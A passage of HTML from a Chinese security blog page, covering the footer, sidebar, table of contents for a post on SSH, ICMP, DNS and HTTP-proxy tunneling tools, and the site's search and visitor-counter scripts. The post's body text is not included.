    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="https://ooo.0o0.ooo/2017/04/12/58ee21687d335.png" alt="RcoIl WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://rcoil.me/2017/06/常用的转发技术/" title="常用的转发技术">http://rcoil.me/2017/06/常用的转发技术/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/系统安全/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> 系统安全</a>
          
            <a href="/tags/tools/" rel="tag"><i class="fa fa-tag" aria-hidden="true"></i> tools</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/05/BurpSuite/" rel="next" title="BurpSuite">
                <i class="fa fa-chevron-left"></i> BurpSuite
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/06/CTF线下赛总结/" rel="prev" title="CTF线下攻防赛总结">
                CTF线下攻防赛总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>


    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODE5NS80NzY4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="RcoIl" />
          <p class="site-author-name" itemprop="name">RcoIl</p>
           
              <p class="site-description motion-element" itemprop="description">好吃懒做，还有就是皮肤比黄皮果还黄！</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">37</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">21</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.dropsec.xyz/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.agteam.net/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#目标是具有公共IP的"><span class="nav-number">1.</span> <span class="nav-text">目标是具有公共IP的</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SSH端口复用"><span class="nav-number">1.1.</span> <span class="nav-text">SSH端口复用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#使用SSH隧道"><span class="nav-number">1.1.1.</span> <span class="nav-text">使用SSH隧道</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3proxy"><span class="nav-number">1.2.</span> <span class="nav-text">3proxy</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NAT情景（穿透）"><span class="nav-number">2.</span> <span class="nav-text">NAT情景（穿透）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#SSH反向端口转发–3proxy"><span class="nav-number">2.1.</span> <span class="nav-text">SSH反向端口转发–3proxy</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Rpivot"><span class="nav-number">2.2.</span> <span class="nav-text">Rpivot</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#内网转发"><span class="nav-number">3.</span> <span class="nav-text">内网转发</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ICMP隧道"><span class="nav-number">3.1.</span> <span class="nav-text">ICMP隧道</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Hans"><span class="nav-number">3.1.1.</span> <span class="nav-text">Hans</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#icmptunnel"><span class="nav-number">3.1.2.</span> <span class="nav-text">icmptunnel</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DNS隧道"><span class="nav-number">3.2.</span> <span class="nav-text">DNS隧道</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Iodine"><span class="nav-number">3.2.1.</span> <span class="nav-text">Iodine</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Dnscat2"><span class="nav-number">3.2.2.</span> <span class="nav-text">Dnscat2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTTP代理"><span class="nav-number">3.3.</span> <span class="nav-text">HTTP代理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Rpivot-1"><span class="nav-number">3.3.1.</span> <span class="nav-text">Rpivot</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Cntlm"><span class="nav-number">3.3.2.</span> <span class="nav-text">Cntlm</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OpenVpn通过HTTP代理"><span class="nav-number">3.3.3.</span> <span class="nav-text">OpenVpn通过HTTP代理</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#使用SOCKS代理"><span class="nav-number">4.</span> <span class="nav-text">使用SOCKS代理</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
